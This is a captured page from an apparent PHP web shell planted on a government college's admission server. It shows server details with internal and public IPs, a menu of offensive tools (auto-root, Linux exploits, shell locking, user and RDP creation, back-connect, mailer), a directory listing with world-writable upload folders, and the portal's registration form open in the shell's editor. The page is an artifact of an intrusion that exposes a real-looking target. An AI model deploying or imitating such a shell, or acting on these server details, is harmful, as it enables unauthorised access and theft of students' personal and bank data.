Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.219.158.84
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
gcg /
adm /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
certificates
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
razorpay
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tcpdf
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxrwxrwx
.DS_Store
7.99
KB
-rwxr-xr-x
MainPage.html
41.09
KB
-rwxr-xr-x
MainPage_dev.html
0
B
-rwxr-xr-x
MainPage_with_values.html
40.77
KB
-rwxr-xr-x
Notification.pdf
41.04
KB
-rwxr-xr-x
Registrationpage.html
6.29
KB
-rwxr-xr-x
Reprint.html
7.51
KB
-rwxr-xr-x
admission_sms_push.php
2.42
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
1.49
KB
-rwxr-xr-x
cronjob_sendsms.php
2.52
KB
-rwxr-xr-x
database.php
405
B
-rwxr-xr-x
direct-signin.php
886
B
-rw-rw-r--
feestr.pdf
33.42
KB
-rwxr-xr-x
forgot-password.php
2.19
KB
-rwxr-xr-x
forgotPassword.html
3.84
KB
-rwxr-xr-x
index.html
8.68
KB
-rwxr-xr-x
index_1.html
130
B
-rwxr-xr-x
instruction.html
10.31
KB
-rwxr-xr-x
instruction_10092018.html
8.37
KB
-rwxr-xr-x
instruction_24092018.html
9.08
KB
-rwxr-xr-x
instruction_regn.html
5.07
KB
-rwxr-xr-x
login.php
294
B
-rwxr-xr-x
registration.html
16.64
KB
-rwxr-xr-x
upload.php
393
B
-rwxr-xr-x
upload1.php
389
B
-rwxr-xr-x
upload_file.php
718
B
-rwxr-xr-x
verify.php
7.28
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : registration.html
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> <meta http-equiv="cache-control" content="max-age=0" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" /> <meta http-equiv="pragma" content="no-cache" /> <title>GCG: Admission Panel</title> <!-- Favicon--> <link rel="icon" href="images/favicon.jpg" type="image/x-icon"> <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,600,700,800&subset=latin-ext" rel="stylesheet"> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet" type="text/css"> <!-- Bootstrap Core Css --> <link href="plugins/bootstrap/css/bootstrap.css?v=111" rel="stylesheet"> <!-- Waves Effect Css --> <link href="plugins/node-waves/waves.css" rel="stylesheet" /> <link href="plugins/dropzone/dropzone.css" rel="stylesheet"> <!-- Custom Css --> <link href="css/style.css" rel="stylesheet"> <link href="css/themes/all-themes.css" rel="stylesheet" /> </head> <body class="theme-blue"> <!-- Page Loader --> <div class="page-loader-wrapper"> <div class="loader"> <div class="preloader"> <div class="spinner-layer pl-red"> <div class="circle-clipper left"> <div class="circle"></div> </div> <div class="circle-clipper right"> <div class="circle"></div> </div> </div> </div> <p>Please wait...</p> </div> </div> <!-- #END# Page Loader --> <!-- Top Bar --> <nav class="navbar"> <div class="container-fluid" style="color: #fff;"> <div class='col-md-12 m-t--5'> <center> <h2>GOVERNMENT COLLEGE(AUTONOMOUS), KALABURAGI</h2> </center> <!-- <a href="#" onclick="homeLink()" style="float: right;margin-top: -25px; font-size:16px;color: #fff;">Home</a> --> </div> </div> </nav> <section class="content" style="margin-top: 10%"> <div class="container-fluid"> <div class="row clearfix" id="cuid"> <div class="col-lg-10 col-md-12 col-sm-12 col-xs-12"> <div class="card" style="padding: 20px;"> <b>Enter Reg. No.<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="studname_err"> Reg. No. is Required </span> <div class="form-line"> <input type="text" id="regno" class="form-control date" placeholder="Reg. No." maxlength="60" style="width: 300PX;"> </div> <br> <button id="challanBtn" type="button" class="btn btn-primary waves-effect btn-lg" onclick="getStudDet()">Submit </button> </div> </div> </div> </div> <div class="tab-content" style="display:none;" id="loadtab"> <!--///////Personal Details Card\\\\\\\--> <div class="row clearfix" id="personal_det" style="display:;"> <div class="col-lg-10 col-md-12 col-sm-12 col-xs-12"> <div class="card"> <div class="header boder-top"> <h2>Application Form</h2> </div> <div class="body" id="body"> <span style="display: none;color : red;" id="verify_app"> <center> <h4>Verify Your Application</h4> </center> </span> <div class="field"> <div class="col-md-5"> <span id="regno"></span> <b>Student Name<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="studname_err"> Name is Required </span> <div class="form-line"> <input type="text" id="studname" disabled class="form-control date" placeholder="Student Name" maxlength="60" onkeypress="return charKeydown(event);" style="text-transform: uppercase" autocomplete="off"> <input type="hidden" id="vregno"> </div> </div> <b>Father Name<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="fatname_err"> Father Name is Required </span> <div class="form-line"> <input type="text" id="fatname" disabled class="form-control date" placeholder="Father's Name" maxlength="60" onkeypress="return charKeydown(event);" style="text-transform: uppercase" autocomplete="off"> </div> </div> <b>Mother Name<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="fatname_err"> Mother Name is Required </span> <div class="form-line"> <input type="text" id="fmotname" disabled class="form-control date" placeholder="Mother Name" maxlength="60" onkeypress="return charKeydown(event);" style="text-transform: uppercase" autocomplete="off"> </div> </div> <b>Mobile No.<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="fatname_err"> Mobile No. is Required </span> <div class="form-line"> <input type="text" id="fmob" disabled class="form-control date" placeholder="Mobile No." maxlength="60" onkeypress="return charKeydown(event);" style="text-transform: uppercase" autocomplete="off"> </div> </div> <b>Caste<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="fatname_err"> Caste is Required </span> <div class="form-line"> <input type="text" id="fcaste" class="form-control date" placeholder="Caste" maxlength="60" onkeypress="return charKeydown(event);" style="text-transform: uppercase" autocomplete="off"> </div> </div> <b>Aadhar No.<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="aadhar_err"> Aadhar No. is Required </span> <div class="form-line"> <input type="text" id="aadhar" class="form-control date" placeholder="Aadhar No." maxlength="60" style="text-transform: uppercase" autocomplete="off"> </div> </div> <b>Student Bank A/c number<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="acno_err"> Student Bank A/c number is Required </span> <div class="form-line"> <input type="text" id="acno" class="form-control date" placeholder="Student Bank A/c number" maxlength="60" style="text-transform: uppercase" autocomplete="off"> </div> </div> <b>IFSC Code<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="ifsc_err"> IFSC Code is Required </span> <div class="form-line"> <input type="text" id="ifsc" class="form-control date" placeholder="IFSC Code" maxlength="60" style="text-transform: uppercase" autocomplete="off"> </div> </div> <b>Degree Name<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="motname_err"> Degree Name is Required </span> <div class="form-line"> <input type="text" id="degree" disabled class="form-control date" placeholder="Degree Name" maxlength="60" onkeypress="return charKeydown(event);" style="text-transform: uppercase" autocomplete="off"> </div> </div> <b>Combination<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="motname_err"> Combination is Required </span> <div class="form-line"> <select id = "fcombcode" class="form-control"> <option value = ''>--Select--</option> </select> </div> </div> <b>Admission Semester<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="motname_err"> Admission Semester is Required </span> <div class="form-line"> <input type="text" id="fexamname" disabled class="form-control date" placeholder="Admission Semester" maxlength="60" onkeypress="return charKeydown(event);" style="text-transform: uppercase" autocomplete="off"> </div> </div> <b>Category<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="motname_err"> Category is Required </span> <div class="form-line"> <input type="text" id="category" disabled class="form-control date" placeholder="Category" maxlength="60" onkeypress="return charKeydown(event);" style="text-transform: uppercase" autocomplete="off"> </div> </div> <b>Amount<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="motname_err"> Amount is Required </span> <div class="form-line"> <input type="text" id="amount" disabled class="form-control date" placeholder="Amount" maxlength="60" onkeypress="return charKeydown(event);" style="text-transform: uppercase" autocomplete="off"> </div> </div> </div> </div> </div> <!-- </div> --> <div id="subjectdet" class="row clearfix"> <div class="col-md-12"> <center> <h4 id="idPaperTitle" style="display: none;">Paper Detail of selected Subject</h4> </center> <div id="subdet" style="padding: 30px;"></div> </div> </div> <div class="footer"> <center> <button type="button" class="btn btn-primary waves-effect btn-lg" onclick="saveRerigistation()">Save</button> </center> </div> </div> </div> </div> </div> <!---////////Application Status Card \\\\\\--> <div class="row clearfix" style="display: none;" id="success_card"> <div class="col-lg-10 col-md-12 col-sm-12 col-xss-12 m-l--50"> <div class="card"> <div class="header boder-top"> <h2>Application Status</h2> </div> <div class="body"> <div class="row clearfix"> <div class="col-md-12" id="makepayment"> <!-- <center> <b><span id="app_msg"></span></b><br><br> <b>Application Number: <span id="dapp_no"></span></b><br><br> <button id="paytmBtn" type="button" class="btn btn-primary waves-effect btn-lg" onclick = "makePayment()">Make Payment </button> </center> --> </div> <div class="col-md-12" id="printmakepayment"> <!-- <center> <b><span id="app_msg"></span></b><br><br> <b>Application Number: <span id="dapp_no1"></span></b><br><br> <button id="challanBtn" type="button" class="btn btn-primary waves-effect btn-lg" onclick = "makePayment()">Print Application </button> </center> --> </div> </div> </div> </div> </div> </div> </div> </div> </section> <script src="js/control.js"></script> <script src="js/validate.js"></script> <script src="js/MainPage.js?v=22" type="text/javascript"></script> <!-- Jquery Core Js --> <script src="plugins/jquery/jquery.min.js"></script> <!-- Bootstrap Core Js --> <script src="plugins/bootstrap/js/bootstrap.js"></script> <!-- Slimscroll Plugin Js --> <script src="plugins/jquery-slimscroll/jquery.slimscroll.js"></script> <script src="plugins/jquery-blockUI/jquery.blockUI.js"></script> <!-- Waves Effect Plugin Js --> <script src="plugins/node-waves/waves.js"></script> <script src="plugins/jquery-validation/jquery.validate.js"></script> <script src="plugins/jquery-steps/jquery.steps.js"></script> <script src="plugins/sweetalert/sweetalert.min.js"></script> <!-- Autosize Plugin Js --> <script src="js/form_submit.js"></script> <!-- Input Mask Plugin Js --> <script src="plugins/jquery-inputmask/jquery.inputmask.bundle.js"></script> <script src="plugins/dropzone/dropzone.js"></script> <script src="plugins/bootstrap-tagsinput/bootstrap-tagsinput.js"></script> <script src="plugins/jquery-validation/jquery.validate.js"></script> <script src="plugins/jquery-steps/jquery.steps.js"></script> <script src="plugins/sweetalert/sweetalert.min.js"></script> <!-- Custom Js --> <script src="js/admin.js"></script> <script src="js/appStatus.js"></script> <!-- Demo Js --> <script src="js/demo.js"></script> <script src="js/advanced-form-elements.js"></script> <script type="text/javascript"> $(function () { $("li").click(function () { // remove classes from all $("li").removeClass("active"); // add class to the one we clicked $(this).addClass("active"); }); }); </script> <script type="text/javascript"> $('#statusDetl').addClass("hidden"); var $demoMaskedInput = $('.daterange'); //Date $demoMaskedInput.find('.date').inputmask('dd/mm/yyyy', { placeholder: '__/__/____' }); $(document).ready(function () { var inputs = $('input, select').keypress(function (e) { if (e.which == 13) { e.preventDefault(); var nextInput = inputs.get(inputs.index(this) + 1); if (nextInput) { nextInput.focus(); } } }); $('input[type=radio][name=group3]').change(function () { if (this.value == 'OTHERS') { $('#finstn').css('display', 'block'); } else if (this.value == 'INDIAN') { $('#finstn').css('display', 'none'); } }); }); </script> <script src="https://checkout.razorpay.com/v1/checkout.js"></script> </body> </html>
Close